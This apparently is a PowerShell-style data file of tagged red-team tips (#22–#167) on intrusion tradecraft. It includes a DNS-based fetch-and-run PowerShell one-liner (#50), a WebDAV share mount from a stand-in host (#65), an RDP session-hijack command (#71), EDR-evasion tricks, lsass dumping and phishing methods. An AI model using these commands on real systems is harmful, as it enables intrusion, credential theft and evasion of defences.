%(tips => 'Red tip #22: Use VNC, microphone and webcam to perform surveillance. Netstat, tasklist can provide context into what the users doing.', tags => @(
'redtip', '#22', 'VNC', 'microphone', 'webcam', 'netstat', 'tasklist'
)
),
%(tips => 'Red tip #23: Stash payloads in C:$Recycle.Bin', tags => @(
'redtip', '#23', 'payload', 'C:', 'Recycle Bin'
)
),
%(tips => 'Red tip #24: Compromise the SOC and Security teams to watch their progress and track their email alerts for sophisticated threats', tags => @(
'redtip', '#24', 'SOC', 'Security', 'email', 'phish', 'alerts'
)
),
%(tips => 'Red tip #25: Probably dont do this on a red team, but spray for Welcome1, Password1 if youre struggling to move. But move off fast.', tags => @(
'redtip', '#25', 'password', 'spray', 'cracking'
)
),
%(tips => 'Red tip #26: Split your campaigns up so that they are independent. Fire tons at once for decoys and to burn out the defense.', tags => @(
'redtip', '#26', 'campaign', 'fire', 'defense'
)
),
%(tips => 'Red tip #27: Need more credentials? Search for passwords on Sharepoint, and intranet.', tags => @(
'redtip', '#27', 'credentials', 'password', 'Sharepoint', 'intranet'
)
),
%(tips => 'Red tip #28: Look for asset registers to understand who owns what machine, make and model. Theres usually an asset label to host name too!', tags => @(
'redtip', '#28', 'asset', 'machine', 'host'
)
),
%(tips => 'Red tip #29: Lateral movement: printers, open webroots, good old Tomcat, what are your quick wins?', tags => @(
'redtip', '#29', 'lateral movement', 'printers', 'webroots', 'tomcat'
)
),
%(tips => 'Red tip #30: Get AD credentials? Turn up on site and you might be able to use them to login to Corporate Wifi :)', tags => @(
'redtip', '#30', 'AD', 'credentials', 'site', 'login', 'wifi'
)
),
%(tips => 'Red tip #31: Hunting e-mails and network shares for penetration testing reports can often yield good results.', tags => @(
'redtip', '#31', 'emails', 'network', 'shares', 'reports'
)
),
%(tips => 'Red tip #32: List mounts: net use, look for shared folders and drop a UNC icon LNK into it. Run Inveigh or Wireshark on host to grab hashes.', tags => @(
'redtip', '#32', 'mount', 'list', 'net', 'shared', 'folders', 'LNK', 'Inveigh', 'Wireshark'
)
),
%(tips => 'Red tip #33: Orgs are transitioning to cloud services such as AWS, Beanstalk, O365, Google Apps. 2FA is vital - password reset to compromise.', tags => @(
'redtip', '#33', 'cloud', 'services', 'AWS', 'O365', 'password', 'Apps'
)
),
%(tips => 'Red tip #34: OpSec. Set notifications to your phone for logins or intrusion attempts in any part of your attack infrastructure.', tags => @(
'redtip', '#34', 'Opsec', 'notification', 'phone', 'login', 'infrastructure'
)
),
%(tips => 'Red tip #35: FireEye sandbox flagging your payloads? Try anti sandbox techniques! If not, just use HTA to get into memory as it doesnt scan', tags => @(
'redtip', '#35', 'FireEye', 'sandbox', 'payload', 'HTA', 'memory'
)
),
%(tips => 'Red tip #36: Dont forget the good old GPP passwords in SYSVOL. There may be cached GPP on the machine. Applying the patch isnt enough', tags => @(
'redtip', '#37', 'GPP', 'password', 'SYSVOL', 'machine', 'patch'
)
),
%(tips => 'Red tip #37: Use GenHTA to generate HTA files that use anti-sandboxing techniques. https://github.com/vysec/GenHTA', tags => @(
'redtip', '#37', 'GenHTA', 'HTA', 'files', 'sandbox'
)
),
%(tips => 'Red tip #38: Having trouble getting @armitagehacker CobaltStrikes evil.hta through defenses? https://github.com/vysec/MorphHTA', tags => @(
'redtip', '#38', 'CobaltStrike', 'HTA', 'morphHTA'
)
),
%(tips => 'Red tip #39: If emails get bounced, read the email! Sometimes due to malware scanners, spam etc. Or you may even get an out of office reply.', tags => @(
'redtip', '#39', 'email', 'malware', 'scanner', 'spam'
)
),
%(tips => 'Red tip #40: @0x09AL suggests looking for default credentials on printers and embedded devices. Move off initial foothold using this.', tags => @(
'redtip', '#40', 'credentials', 'printers', 'devices', 'foothold'
)
),
%(tips => 'Red tip #41: @Oddvarmoe suggests using Alternate Data Streams if you need to put a file on disk. For example https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1', tags => @(
'redtip', '#41', 'ADS', 'Data', 'Streams', 'file', 'disk'
)
),
%(tips => 'Red tip #42: Got OS level access to a middle tier? Task list, netstat and wmic process list full | findstr /I commandline for more ideas!', tags => @(
'redtip', '#42', 'OS', 'access', 'tier', 'wmic', 'process', 'list', 'findstr'
)
),
%(tips => 'Red tip #43: So you know where the server application files are. Download the binaries and check out configuration files for conn. strings', tags => @(
'redtip', '#43', 'server', 'files', 'application', 'binaries', 'config'
)
),
%(tips => 'Red tip #44: Run PEiD and other packer / technology checkers to find out the language and packer used on downloaded server binaries.', tags => @(
'redtip', 'PEiD', 'packer', 'language', 'binaries'
)
),
%(tips => 'Red tip #45: Run strings on the application binary for potentially other cleartext sensitive strings! (Unicode mode too)', tags => @(
'redtip', '#45', 'strings', 'application', 'binary', 'cleartext'
)
),
%(tips => 'Red tip #46: On a VDI? Check out C:\ and other disks for potentially sensitive files other users may have saved there.', tags => @(
'redtip', '#46', 'VDI', 'C:', 'disks', 'sensitive', 'files'
)
),
%(tips => 'Red tip #47: Incase EDR are looking for "net users /domain" try using "net use /dom"', tags => @(
'redtip', '#47', 'EDR', 'net', 'users', 'domain', 'dom'
)
),
%(tips => 'Red tip #48: Is EDR potentially looking for "powershell -encodedcommand"? Try "powershell -ec"', tags => @(
'redtip', '#48', 'EDR', 'powershell', 'encoded', 'command'
)
),
%(tips => 'Red tip #49: Attacking a heavy Macintosh or Linux estate? Send a Office Maldoc with OS checking logic to obtain footholds on either system', tags => @(
'redtip', '#49', 'Mac', 'linux', 'Office', 'OS', 'foothold'
)
),
%(tips => 'Red tip #50: Carbon Black checks for IEX and web req commands. Use powershell "powershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]"', tags => @(
'redtip', '#50', 'Carbon Black', 'IEX', 'web', 'powershell'
)
),
%(tips => 'Red tip #51: Cant open C drive? Try \127.0.0.1\c$', tags => @(
'redtip', '#51', 'C:', '127.0.0.1', 'c$'
)
),
%(tips => 'Red tip #52: SC doesnt take credentials. Cant use runas? Try net use \targetip\ipc$ password /u:domain\username then sc to psexec', tags => @(
'redtip', '#52', 'SC', 'credentials', 'runas', 'target', 'ip', 'password', 'domain', 'psexec'
)
),
%(tips => 'Red tip #53: When stick phishing for 2FA, consider using @mrgretzky Evilginx project which logs cookies. https://breakdev.org/evilginx-1-1-release/', tags => @(
'redtip', '#53', 'phishing', 'evilginx', 'logs', 'cookies'
)
),
%(tips => 'Red tip #54: Hide from blue. Volume shadow copy then execute \?\GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll then delete VSC', tags => @(
'redtip', '#54', 'hidden', 'VSS', 'shadow', 'copy', 'execute', 'VSC'
)
),
%(tips => 'Red tip #55: SMB hash leaking using a UNC path for image in page for drive by leak can give you credentials for less mature environments.', tags => @(
'redtip', '#55', 'SMB', 'hash', 'UNC', 'credentials'
)
),
%(tips => 'Red tip #56: Target victims using email authentication such as Microsoft Account on Windows 10? Hash leak exposes full email address!', tags => @(
'redtip', '#56', 'target', 'email', 'authentication', 'microsoft', 'windows'
)
),
%(tips => 'Red tip #57: Working in teams yields better results; and best of all Makes Offensive operations more fun and keeps the adrenaline pumping', tags => @(
'redtip', '#57', 'team', 'operations', 'red'
)
),
%(tips => 'Red tip #58: Discuss business targets and objectives with your clients. This process should set non technical goals such as "ATM spit money"', tags => @(
'redtip', '#58', 'business', 'targets', 'objectives', 'client', 'goals'
)
),
%(tips => 'Red tip #59: Checking whether a server or host is good for egress? Likely to go down? "systeminfo | findstr /i boot"', tags => @(
'redtip', '#59', 'server', 'host', 'egree', 'systeminfo'
)
),
%(tips => 'Red tip #60: Type "query user" to see who else is connected to the machine.', tags => @(
'redtip', '#60', 'query', 'user', 'machine'
)
),
%(tips => 'Red tip #61: Get a quick patch list using wmic qfe list brief. Cross ref KB to bulletins.', tags => @(
'redtip', '#61', 'patch', 'wmic', 'qfe', 'KB'
)
),
%(tips => 'Red tip #62: Found a process of interest? Dont forget to obtain a MiniDump! Use Out-MiniDump https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1', tags => @(
'redtip', '#62', 'process', 'Minidump', 'powershell'
)
),
%(tips => 'Red tip #63: Finally in CyberArk, click policies and see safes but no account? Go to accounts search and search for empty and safes show up', tags => @(
'redtip', '#63', 'CyberArk', 'policies', 'account'
)
),
%(tips => 'Red tip #64: Is WebDav allowed through the gateway? Using http mini redirector? Dont exfiltrate or send in files. WebDav is subject to DLP', tags => @(
'redtip', '#64', 'webdav', 'gateway', 'http', 'redirector', 'DLP'
)
),
%(tips => 'Red tip #65: WebDav mini http redirector: net use * http://totallylegit.com/share . Then start z:', tags => @(
'redtip', '#65', 'webdav', 'mini', 'http', 'redirector'
)
),
%(tips => 'Red tip #66: Found potential MQ creds? ActiveMQ? Try out https://github.com/fmtn/a , works to query MQ endpoints that dont use self signed crt', tags => @(
'redtip', '#66', 'MQ', 'credentials', 'endpoints', 'crt'
)
),
%(tips => 'Red tip #67: Use vssadmin to list and create volume shadow copies', tags => @(
'redtip', '#67', 'vssadmin', 'list', 'volume', 'shadow'
)
),
%(tips => 'Red tip #68: Pivoting into a secure zone that has no DNS or web gateway and need exfil? Netsh port forward pivot UDP 53 to DNS 53 then boom', tags => @(
'redtip', '#68', 'pivot', 'DNS', 'web', 'gateway', 'UDP', 'exfil'
)
),
%(tips => 'Red tip #69: Have blue hidden the ways including winkey+R? Try shift and right click desktop and open command prompt', tags => @(
'redtip', '#69', 'hidden', 'blue', 'winkey', 'command', 'prompt'
)
),
%(tips => 'Red tip #70: Tracked down that putty session? Popped the box? Query user and check the victims logon time and idle times', tags => @(
'redtip', '#70', 'putty', 'session', 'Query', 'user', 'logon', 'time'
)
),
%(tips => 'Red tip #71: Hijack his Session using sc create sesshijack binpath= "cmd.exe /k tscon /dest:" then use putty session', tags => @(
'redtip', '#71', 'session', 'sc', 'hijack', 'putty', 'cmd.exe'
)
),
%(tips => 'Red tip #72: Most people understand email sec wrong. SPF does not mean not spoofable. SPF does nothing without DMARC.', tags => @(
'redtip', '#72', 'email', 'SPF', 'DMARC'
)
),
%(tips => 'Red tip #73: Weak DMARC on victim org domain? Spoof their own emails back into themselves! You even inherit their AD name and photo', tags => @(
'redtip', '#73', 'DMARC', 'domain', 'spoof', 'emails', 'AD'
)
),
%(tips => 'Red tip #74: Got access to Microsoft OWA mailbox or O365? You can extract global catalog from contacts use @Burp_Suite and parse JSON object', tags => @(
'redtip', '#74', 'access', 'microsoft', 'OWA', 'mailbox', 'O365', 'burpsuite'
)
),
%(tips => 'Red tip #75: Write PHP delivery scripts that can mutate your payloads and add unique trackers per download. This tracks file being executed', tags => @(
'redtip', '#75', 'PHP', 'delivery', 'scripts', 'payload', 'download', 'files'
)
),
%(tips => 'Red tip #76: Simulating a criminal threat story with smash and grab agenda? Phish users and hot swap payload mid campaign to test formats', tags => @(
'redtip', '#76', 'criminal', 'agenda', 'phish', 'users', 'campaign'
)
),
%(tips => 'Red tip #77: RCE on a web application for less mature client? nslookup -q=srv _ldap._tcp if its domain joined Invoke-Kerberoast', tags => @(
'redtip', '#77', 'RCE', 'web', 'application', 'client', 'nslookup', 'domain', 'kerberoast'
)
),
%(tips => 'Red tip #78: @benichmt1 suggests looking for vmdk files across the network. You can use this to potentially access segregated networks', tags => @(
'redtip', '#78', 'vmdk', 'files', 'network', 'access'
)
),
%(tips => 'Red tip #79: Obfuscation is never bad, especially when its a button click. @danielhbohannon - https://github.com/danielbohannon', tags => @(
'redtip', '#79', 'Obfuscation', 'danielbohannon'
)
),
%(tips => 'Red tip #80: Need to sweep for uptimes? Use wmic /node:"" OS get LastBootUpTime in a for loop', tags => @(
'redtip', '#80', 'uptime', 'wmic', 'OS'
)
),
%(tips => 'Red tip #81: Looking for systems running KeePass? Run a for loop on wmic /node:"host" process list brief :) then look at RT #82', tags => @(
'redtip', '#81', 'sytems', 'KeePass', 'wmic', 'host', 'process', 'list'
)
),
%(tips => 'Red tip #82: Found KeePass running in memory? Use @harmj0y KeeThief to extract password and dl the KDBX - https://github.com/HarmJ0y/KeeThief', tags => @(
'redtip', '#82', 'KeePass', 'memory', 'harmj0y', 'KeeThief', 'password'
)
),
%(tips => 'Red tip #83: Struggling to find a working DB client? Live off the land and use your victims in an RDP session.', tags => @(
'redtip', '#83', 'DB', 'client', 'RDP', 'session'
)
),
%(tips => 'Red tip #84: Im sure everyone hates Oracle DB but no sweat, you can proxycap sqldeveloper.exe', tags => @(
'redtip', '#84', 'Oracle', 'DB', 'proxycap', 'sql'
)
),
%(tips => 'Red tip #85: Check the users calendars before using persistence on their machine. They may be out of office and screw your master plans.', tags => @(
'redtip', '#85', 'users', 'calendars', 'persistence', 'machine', 'office'
)
),
%(tips => 'Red tip #86: Red team and attack simulation is not penetration testing. You shouldnt be really testing anything, but simply infiltrating.', tags => @(
'redtip', '#86', 'red team', 'attack', 'testing', 'penetration'
)
),
%(tips => 'Red tip #87: @Oddvarmoe uses .UDL files to quickly launch a MSSQL connection test to validate credentials! https://blogs.msdn.microsoft.com/farukcelik/2007/12/31/basics-first-udl-test/', tags => @(
'redtip', '#87', 'UDL', 'files', 'MSSQL', 'credentials'
)
),
%(tips => 'Red tip #88: Dont forget Physical security! Whip up a PI with GSM and you can hack your way in by dropping the PI on network.', tags => @(
'redtip', '#88', 'Physical', 'security', 'PI', 'GSM', 'network'
)
),
%(tips => 'Red tip #89: regsvr32 SCT files are being detected as Squigglydoo. Looks for "script" case sensitive and "<registration" case insensitive.', tags => @(
'redtip', '#89', 'regsvr32', 'SCT', 'files', 'squigglydoo', 'script'
)
),
%(tips => 'Red tip #90: Cisco NGIPS is shit, when analysing traffic for havex it drops only but not', tags => @(
'redtip', '#90', 'Cisco', 'NGIPS', 'traffic', 'analysis'
)
),
%(tips => 'Red tip #91: Decoys can be as simple as burning egress by port scanning 1-1024 through IDS, or spamming dodgy emails at blocks of employees', tags => @(
'redtip', '#91', 'egress', 'port', 'scanning', 'IDS', 'emails'
)
),
%(tips => 'Red tip #92: If WDigest is disabled, reenable it for cleartext credentials before new users login with @harmj0y https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke-WdigestDowngrade.ps1', tags => @(
'redtip', '#92', 'wdigest', 'credentials', 'login'
)
),
%(tips => 'Red tip #93: Use Empyre to generate Macintosh and Linux payloads, modify it to contain code for Windows too! https://github.com/EmpireProject/EmPyre', tags => @(
'redtip', '#93', 'Empire', 'MAC', 'linux', 'payload', 'Empyre'
)
),
%(tips => 'Red tip #94: Client uses VDIs? Compromise underlying host and use Citrix Shadow Taskbar to spy on VDI sessions by selecting username', tags => @(
'redtip', '#94', 'VDI', 'Citrix', 'host'
)
),
%(tips => 'Red tip #95: @domchell recommends avoiding non persistent VDIs and persist on laptops. Query DC for live laptops.', tags => @(
'redtip', '#95', 'VDI', 'persistence', 'DC', 'laptop'
)
),
%(tips => 'Red tip #96: @lucasgates recommends using OLE objects containing VBS scripts instead of Macros as less suspicious. VBE will work too', tags => @(
'redtip', '#96', 'OLE', 'VBS', 'scripts', 'Macros', 'VBE'
)
),
%(tips => 'Red tip #97: Use recent critical vulnerabilities such as CVE-2017-0199 HTA handler issue to simulate real threats. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/', tags => @(
'redtip', '#97', 'vulnerabilities', 'CVE', 'HTA'
)
),
%(tips => 'Red tip #98: @0x09AL suggests WordSteal. You can embed an IMAGE with UNC path to steal hashes from Word. Wont work if proxy. https://github.com/0x09AL/WordSteal', tags => @(
'redtip', '#98', 'WordSteal', 'image', 'UNC', 'word'
)
),
%(tips => 'Red tip #99: If client is using Proxy with WebDav you can phish creds using @ryHanson Phishery https://github.com/ryhanson/phishery', tags => @(
'redtip', '#99', 'client', 'Proxy', 'WebDav', 'phish', 'creds'
)
),
%(tips => 'Red tip #100: Use wgsidav if you need a quick WebDav server :) https://github.com/mar10/wsgidav', tags => @(
'redtip', '#100', 'wgsidav', 'webdav', 'server'
)
),
%(tips => 'Red tip #101: Set up red team infrastructure following @bluscreenofjeff guidelines! https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki', tags => @(
'redtip', '#101', 'red team', 'infrastructure', 'jeff', 'wiki'
)
),
%(tips => 'Red tip #102: Easier DNS redirector! https://pastebin.com/LNj4zjFs for opsec and not hosting C2 on the cloud', tags => @(
'redtip', '#102', 'DNS', 'redirector', 'opsec', 'c2'
)
),
%(tips => 'Red tip #103: Red team tips are useful but what makes the good red teamer is experience. Rack up that breadth of experience', tags => @(
'redtip', '#103', 'experience', 'tips'
)
),
%(tips => 'Red tip #104: SessionGopher does a decent job at retrieving putty and RDP history - https://github.com/fireeye/SessionGopher', tags => @(
'redtip', '#104', 'SessionGopher', 'putty', 'RDP', 'history'
)
),
%(tips => 'Red tip #105: If ping 8.8.8.8 works, try ICMP tunneling. More info at http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?m=1 from @fragsh3ll though only on immature network', tags => @(
'redtip', '#105', 'ping', 'ICMP', 'tunneling'
)
),
%(tips => 'Red tip #106: Wordlists? https://github.com/berzerk0/Probable-WordlistsI like to use the top probable 297 million list with Deadhobo rules', tags => @(
'redtip', '#106', 'Wordlists', 'rules', 'list'
)
),
%(tips => 'Red tip #107: More of a pentest tip but nslookup http://google.com if it resolves you may have a DNS tunneling problem.', tags => @(
'redtip', '#017', 'pentest', 'nslookup', 'DNS', 'tunneling'
)
),
%(tips => 'Red tip #108: Post exploitation Asset Discovery https://github.com/vysec/Invoke-DNSDiscovery looks for assets by name that might be good if youre low priv user.', tags => @(
'redtip', '#108', 'exploitation', 'asset', 'DNS', 'user'
)
),
%(tips => 'Red tip #109: Use Invoke-ProcessScan to give some running processes context on a system. This uses EQGRP leaked list- https://github.com/vysec/Invoke-ProcessScan', tags => @(
'redtip', '#109', 'process', 'scan', 'EQGRP'
)
),
%(tips => 'Red tip #110: Mature blue? Be careful and minidump lssas.exe then download it and parse locally', tags => @(
'redtip', '#110', 'mature', 'blue', 'minidump', 'lssas'
)
),
%(tips => 'Red tip #111: Found an exploitable S4U condition? Use Mistique to attack! https://github.com/machosec/Mystique/blob/master/Mystique.ps1', tags => @(
'redtip', '#111', 'S4U', 'Mistique'
)
),
%(tips => 'Red tip #112: Need to use VNC as RDP in use? https://github.com/artkond/Invoke-Vnc has been pretty stable for me. Run it then pivot in and connect!', tags => @(
'redtip', '#112', 'VNC', 'RDP', 'pivot'
)
),
%(tips => 'Red tip #113: Found super secret.doc or master password database.xlsx? Use office2john to get hash and crack in Hashcat!', tags => @(
'redtip', '#113', 'password', 'database', 'xlsx', 'hashcat'
)
),
%(tips => 'Red tip #114: PowerUp didnt work and you want to autoruns? Dont bother going on disk, use Invoke-AutoRuns to csv- https://github.com/p0w3rsh3ll/AutoRuns', tags => @(
'redtip', '#114', 'PowerUp', 'autoruns', 'powershell'
)
),
%(tips => 'Red tip #115: Need to zip up a directory quickly for easy exfiltration? Eg. Home shares https://github.com/thoemmi/7Zip4Powershell use Powershell', tags => @(
'redtip', '#115', 'zip', 'exfil', 'powershell'
)
),
%(tips => 'Red tip #116: Use CatMyFish to search for categorised domains that could be used in your engagements - https://github.com/Mr-Un1k0d3r/CatMyFish', tags => @(
'redtip', '#116', 'CatMyFish', 'domains', 'engagements'
)
),
%(tips => 'Red tip #117: Ran Invoke-MapDomainTrusts from PowerView? Use @harmj0y DomainTrustExplorer to generate a graph - https://github.com/sixdub/DomainTrustExplorer', tags => @(
'redtip', '#117', 'PowerView', 'domain', 'trust', 'graph'
)
),
%(tips => 'Red tip #118: FOCA finds some useful information for OSINT and intelligence phases. https://www.elevenpaths.com/labstools/foca/index.html', tags => @(
'redtip', '#118', 'FOCA', 'OSINT', 'intelligence'
)
),
%(tips => 'Red tip #119: GoPhish is a pretty useful tool for spinning up simple phishing campaigns especially for decoys https://getgophish.com', tags => @(
'redtip', '#119', 'GoPhish', 'tool', 'phishing', 'email', 'campaigns'
)
),
%(tips => 'Red tip #120: If you have write access to the orgs shared Office template folders You can privesc by backdooring these trusted documents.', tags => @(
'redtip', '#120', '', '', ''
)
),
%(tips => 'Red tip #121: @zwned uses netsh packet tracing to sniff natively from victim host. Save capture and analyze offline!', tags => @(
'redtip', '#121', 'netsh', 'packet', 'sniff', 'capture'
)
),
%(tips => 'Red tip #122: More decoy tips! Scan the external perimeter with tools like Nessus and OpenVAS. More traffic the better just to burn the blue', tags => @(
'redtip', '#122', 'decoy', 'external', 'perimeter', 'Nessus', 'OpenVAS'
)
),
%(tips => 'Red tip #123: Read Sean Metcalfa blog http://adsecurity.org/ When AD is used in many environments, it vital to at least know techniques', tags => @(
'redtip', '#123', 'AD', 'environments', 'techniques'
)
),
%(tips => 'Red tip #124: Remember you can generate a golden ticket offline with knowledge of krbtgt and rest offline. Golden ticket gets silver from DC', tags => @(
'redtip', '#124', 'golden', 'ticket', 'krbtgt', 'DC', 'silver'
)
),
%(tips => 'Red tip #125: Got krbtgt of a child domain? Forest parent trusts you? Use the SID history attack in golden tickets to escalate to Ent Admin', tags => @(
'redtip', '#125', 'krbtgt', 'domain', 'Forest', 'trust', 'SID', 'admin'
)
),
%(tips => 'Red tip #126: You dont necessarily need Domain Admin, if you have an account that has "Replicating directory changes", dcsync to pull hash', tags => @(
'redtip', '#126', 'domain', 'admin', 'account', 'dcsync', 'hash'
)
),
%(tips => 'Red tip #127: Planning to use secretsdump.py? :) Try using the DC machine account to authenticate and dump instead of a user! Save hash', tags => @(
'redtip', '#127', 'secretsdump', 'DC', 'machine', 'account', 'authenticate', 'dump', 'hash'
)
),
%(tips => 'Red tip #128: Use machine account hashes to generate silver tickets to a host for persistence. Save machine hash for DC incase krbtgt rotate', tags => @(
'redtip', '#128', 'machine', 'account', 'hashes', 'ticket', 'persistence', 'DC', 'krbtgt'
)
),
%(tips => 'Red tip #129: Use PEAS to query shares and emails if using ActiveSync - https://github.com/mwrlabs/peas', tags => @(
'redtip', '#129', 'PEAS', 'shares', 'emails', 'ActiveSync'
)
),
%(tips => 'Red tip #130: (Not red really but useful) Sort IPs: cat IPs.txt | sort -t . -k1,1 -k2,2 -k3,3 -k4,4', tags => @(
'redtip', '#130', 'IP', 'cat', 'sort'
)
),
%(tips => 'Red tip #131: Learn AWK and general bash scripting. Processing and merging of data sets speeds up our job for discovery and time keeping.', tags => @(
'redtip', '#131', 'AWK', 'bash', 'scripting', 'data'
)
),
%(tips => 'Red tip #132: Worth learning to pick locks and the dust can sensor trick if youre going to do some physical. http://www.artofmanliness.com/2014/11/19/how-to-pick-a-lock-pin-tumbler-locks/', tags => @(
'redtip', '#132', 'lock', 'dust', 'physical', 'pick'
)
),
%(tips => 'Red tip #133: Grep has an extract flag -o that can be used to extract from a regex. Good for extracting data from massive blobs.', tags => @(
'redtip', '#133', 'grep', 'flag', 'regex', 'blobs'
)
),
%(tips => 'Red tip #134: Victims use wireless? Use KARMA attack to force them onto your network. Use eternalblue, domain creds or other vulns to get in. https://github.com/sensepost/mana', tags => @(
'redtip', '#134', 'wireless', 'KARMA', 'network', 'eternalblue', 'domain'
)
),
%(tips => 'Red tip #135: Phishing pages are usually custom. However its always good to have a stash for decoys. Generic Gmail, Office365?', tags => @(
'redtip', '#135', 'phishing', 'decoy', 'gmail', 'Office365'
)
),
%(tips => 'Red tip #136: Keep up to date by watching presentations from conferences on YouTube :) Discover useful techniques', tags => @(
'redtip', '#136', 'presentation', 'conferences', 'YouTube'
)
),
%(tips => 'Red tip #137: If youve exhausted all payload types, try sending a Mac user a python one liner and Win PS 1 liner. Ive had people run it.', tags => @(
'redtip', '#137', 'payload', 'Mac', 'python', 'one-liner'
)
),
%(tips => 'Red tip #139: If you need to get a clean EXE for file drop and exec, try out @midnite_runr Backdoor Factory - https://github.com/secretsquirrel/the-backdoor-factory', tags => @(
'redtip', '#139', 'EXE', 'file', 'backdoor', 'factory'
)
),
%(tips => 'Red tip #140: If enemy does not use proxy with TLS inspection then you can use https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/ to mask your c2 channel further', tags => @(
'redteam', '#140', 'proxy', 'TLS', 'c2', 'domains'
)
),
%(tips => 'Red tip #141: On a Linux box and want to egress from it over a proxy? Use ProxyTunnel to pipe SSH - https://github.com/proxytunnel/proxytunnel', tags => @(
'redtip', '#141', 'linux', 'egress', 'proxy', 'Tunnel', 'SSH'
)
),
%(tips => 'Red tip #142: Need some OSINT? Keep Spiderfoot running long term to accompany your manual OSINT sources http://www.spiderfoot.net', tags => @(
'redtip', '#142', 'OSINT', 'Spiderfoot'
)
),
%(tips => 'Red tip #143: OSINTing? TheHarvester does a decent job at subdomains. Though theres better ways to get emails bulk. https://github.com/laramies/theHarvester', tags => @(
'redtip', '#143', 'OSINT', 'Harvester', 'subdomains', 'emails'
)
),
%(tips => 'Red tip #144: Exploring and want to use WMI? https://www.microsoft.com/en-us/download/details.aspx?id=8572 is pretty useful for exploring the different namespaces and classes.', tags => @(
'redtip', '#144', 'WMI', 'namespace', 'classes'
)
),
%(tips => 'Red tip #145: Need to reset a password? Do it then quickly dcsync for previous password hash and use NTLMinject - https://github.com/vletoux/NTLMInjector', tags => @(
'redtip', '#145', 'password', 'dcsync', 'hash', 'NTLM', 'inject'
)
),
%(tips => 'Red tip #146: IDS flagging known payload binary blob? Base64 encode it in your payload and use certutil, PS or VB to decode it!', tags => @(
'redtip', '#146', 'IDS', 'payload', 'binary', 'base64', 'certutil'
)
),
%(tips => 'Red tip #147: Test your phishing campaigns before sending!!!', tags => @(
'redtip', '#147', 'phishing', 'campaign', 'email'
)
),
%(tips => 'Red tip #148: If youre sending into Exchange, make sure your SMTP server is not in SPAM list or black lists. Check junk mails mail headers', tags => @(
'redtip', '#148', 'Exchange', 'SMTP', 'SPAM', 'email'
)
),
%(tips => 'Red tip #149: Use Microsofts Message Header Analyzer to parse and review email headers from Outlook. https://testconnectivity.microsoft.com/MHA/Pages/mha.aspx', tags => @(
'redtip', '#149', 'Microsoft', 'message', 'email', 'Outlook'
)
),
%(tips => 'Red tip #150: Make sure phishing emails Bounce header matches From. Or else some will flag as malicious.', tags => @(
'redtip', '#150', 'phishing', 'emails', 'flag', 'header'
)
),
%(tips => 'Red tip #151: DomainHunter also looks for good candidate expired domains - https://github.com/minisllc/domainhunter', tags => @(
'redtip', '#151', 'Domain', 'Hunter', 'domains'
)
),
%(tips => 'Red tip #152: Want to scrape MetaData in CLI? Use PowerMeta. Linux users can use PowerShell too! https://github.com/dafthack/PowerMeta', tags => @(
'redtip', '#152', 'MetaData', 'CLI', 'linux', 'PowerShell'
)
),
%(tips => 'Red tip #153: RDP in use? Dont want to use VNC? Try mimikatzs ts::multirdp in memory patch by @gentilkiwi', tags => @(
'redtip', '#153', 'RDP', 'VNC', 'mimikatz', 'memory'
)
),
%(tips => 'Red tip #154: Admin on a machine with VPN client? certificate extraction using Mimikatz by @gentilkiwi. Dont forget to dl configs. Backdoor', tags => @(
'redtip', '#154', 'Admin', 'machine', 'VPN', 'certificate', 'mimikatz', 'backdoor'
)
),
%(tips => 'Red tip #155: Master all the quick wins to Domain privilege escalation. When youre pressured to get DA in 15 mins, you want to know you can', tags => @(
'redtip', '#155', 'domain', 'privesc', 'DA', 'escalation'
)
),
%(tips => 'Red tip #156: @Akijos notes that we should be careful when using silver tickets with scheduled tasks. Author is the user account youre on.', tags => @(
'redtip', '#156', 'silver', 'tickets', 'account', 'user'
)
),
%(tips => 'Red tip #157: If you dont need a golden ticket, dont generate it.', tags => @(
'redtip', '#157', 'golden', 'ticket', 'generate'
)
),
%(tips => 'Red tip #158: Scan a DNS server for Alexa top 1 million spoofable domains :) Ive got a massive list, do you?', tags => @(
'redtip', '#158', 'DNS', 'server', 'Alexa', 'domains'
)
),
%(tips => 'Red tip #159: Scan the internet for a list of domain frontable domains! Ive got a big big list ready for whenever I want to use them :)', tags => @(
'redtip', '#159', 'scan', 'internet', 'domain', 'fronting'
)
),
%(tips => 'Red tip #160: We all know people share credentials between different services. Try these credentials on other accounts owned by the user!', tags => @(
'redtip', '#160', 'credentials', 'services', 'accounts', 'user'
)
),
%(tips => 'Red tip #161: Cant crack a password? Try the users previous passwords from history in AD. They may follow a pattern.', tags => @(
'redtip', '#161', 'password', 'crack', 'history', 'AD'
)
),
%(tips => 'Red tip #162: Cant crack a hash owned by a user? Take all previously discovered passwords from their files and generate a new word list.', tags => @(
'redtip', '#162', 'hash', 'crack', 'password', 'files', 'wordlist'
)
),
%(tips => 'Red tip #163: Cant crack a password? Make sure these are in your word list: name of company, town, capital, country, months! Appear a lot.', tags => @(
'redtip', '#163', 'crack', 'password', 'wordlist'
)
),
%(tips => 'Red tip #164: Didier Stevens has SelectMyParent tool that lets you spawn a child process with an arbitrary parent. https://blog.didierstevens.com/2017/03/20/that-is-not-my-child-process/', tags => @(
'redtip', '#164', 'tool', 'SelectMyParent', 'process', 'parent'
)
),
%(tips => 'Red tip #165: Using SelectMyParent stops those detections eg. powershell.exe spawning cmd.exe. @armitagehackers CobaltStrike has ppid cmd!', tags => @(
'redtip', '#165', 'powershell.exe', 'cmd.exe', 'detections', 'CobaltStrike'
)
),
%(tips => 'Red tip #166: Use PowerPoint mouse over text to invoke a powershell command one liner. #adversarysimulation - https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/', tags => @(
'redtip', '#166', 'PowerPoint', 'powershell', 'one-liner', 'adversary'
)
),
%(tips => 'Red tip #167: Follow @mattifestation to keep up to date with blue team advances. Just in case blue is actually up to date with mitigations!', tags => @(
'redtip', '#167', 'mitigation', 'mattifestation', 'blue', 'team'
)
),
